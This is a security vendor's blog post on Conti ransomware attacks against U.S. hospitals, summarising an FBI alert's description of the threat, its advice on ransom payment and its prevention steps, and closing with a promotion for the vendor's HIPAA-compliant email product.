Conti, a notorious type of ransomware first identified in 2020, has taken specific aim at U.S. healthcare organizations. In a "Flash Alert" issued last month, The Federal Bureau of Investigations (FBI) has identified at least 16 Conti attacks on healthcare systems within the last year, the sector most targeted among the 290 U.S. organizations victimized by Conti during that same period. And just last week, the Wall Street Journal published a profile of "the ruthless hackers behind ransomware attacks on U.S. hospitals," connecting the dots to a total of 235 attacks against general hospitals and inpatient psychiatric facilities, plus dozens of other healthcare facilities in the U.S. since 2018.
What is Conti?
Conti exploits weaknesses in Microsoft Windows and other Microsoft products. It "typically steals victims’ files and encrypts the servers and workstations in an effort to force a ransom payment from the victim," the FBI explains. "If the ransom is not paid, the stolen data is sold or published to a public site controlled by the Conti actors." While ransom demands vary depending on the victim, recent demands have been as high as $25 million.
SEE ALSO: To Pay or to Not Pay for Stolen Data
Though not a formally organized group, the hackers behind Conti are based in Russia and are also responsible for the Ryuk ransomware variant.
Why attack healthcare organizations?
Hospitals and clinics are not being attacked at random, but are being deliberately sought out, the Wall Street Journal reports. "Hospitals are especially lucrative targets because many have lax cybersecurity controls, and the business of life and death is highly vulnerable to extortion," the newspaper explains. "Targeting healthcare networks can delay access to vital information, potentially affecting care and treatment of patients including cancellation of procedures, rerouting to unaffected facilities, and compromise of protected health information," the FBI says. And while some attackers are open to negotiation, this Russian crime ring is not. "They do not care," Coveware CEO Bill Siegel told the Journal. "Patient care, people dying, whatever. It doesn’t matter.” As for first responder networks, the FBI points out that ransomware can increase safety risks for personnel and endanger the public. "Loss of access to law enforcement networks may impede investigative capabilities and create prosecution challenges," the bureau adds.
How are the attacks conducted?
Like most forms of ransomware, Conti and Ryuk lock victims out of their own systems and demand payment to recover their data. "Conti weaponizes Word documents with embedded Powershell scripts," the FBI explains, which turns innocuous-looking email attachments into complex malware transmission tools. "Actors are observed inside the victim network between four days and three weeks on average before deploying Conti ransomware." The malware is sophisticated enough to take advantage of software and tools already present on the network, then bringing in other components as needed "to escalate privileges and move laterally through the network before exfiltrating and encrypting data."
What should victims do?
Although the loss or unauthorized disclosure of confidential company and client information is significant, the FBI strongly discourages organizations from paying ransoms—in part because doing so doesn't guarantee that the attackers will hold up their end of the bargain. "Payment does not guarantee files will be recovered," the FBI alert notes. "It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities." Nonetheless, the FBI acknowledges that victims must act in their own best interest. Whether or not an organization pays a ransom, the FBI urges companies to promptly report ransomware incidents to their local field offices or the FBI’s 24/7 Cyber Watch ( CyWatch). "Doing so provides the FBI with critical information needed to prevent future attacks by identifying and tracking ransomware attackers and holding them accountable under U.S. law." Of course, if medical patient information is involved, a HIPAA breach notification will need to be filed with the U.S. Department of Health and Human Services.
How can hacks be prevented?
The FBI alert lays out more than a dozen recommendations, including the following:
- Regularly back up data and protecting offline backup copies with passwords. Ensure copies of critical data are not accessible for modification or deletion.
- Implement a business continuity plan which includes maintaining and retaining multiple copies of sensitive or proprietary data in a physically separate, secure location (i.e., hard drive, storage device, the cloud).
- Install updates and patching operating systems, software, and firmware as soon as they are released.
- Use strong passwords and regularly change passwords. Avoid reusing passwords for multiple accounts.
- Focus on cybersecurity awareness and training. Train employees on information security principles and techniques, as well as overall emerging cybersecurity risks and vulnerabilities (i.e., ransomware and phishing scams).
Strong email security is a must
The best way to safeguard an organization is a multi-layered security strategy. And as far as email is concerned, we recommend a zero-trust security framework, in which no email sender should automatically be trusted. Implemented correctly, the responsibility to catch threats can be lifted from employees by using technology to block malicious emails before they reach the inbox.
Paubox Email Suite Plus can do this, as part of its overall mission to provide HIPAA compliant email. It blocks incoming phishing messages and other email threats from reaching the inbox. And with our HITRUST CSF certified solution, all outbound emails are encrypted and sent directly from you existing email platform (such as Microsoft 365 or Google Workspace). Moreover, our solution comes with our patented ExecProtect feature, built to block display name spoofing emails, a common tactic used in email phishing, and Zero Trust Email requires an additional piece of evidence to authenticate every single email before being delivered to your team’s inboxes. Protect your organization today, starting with strong email security.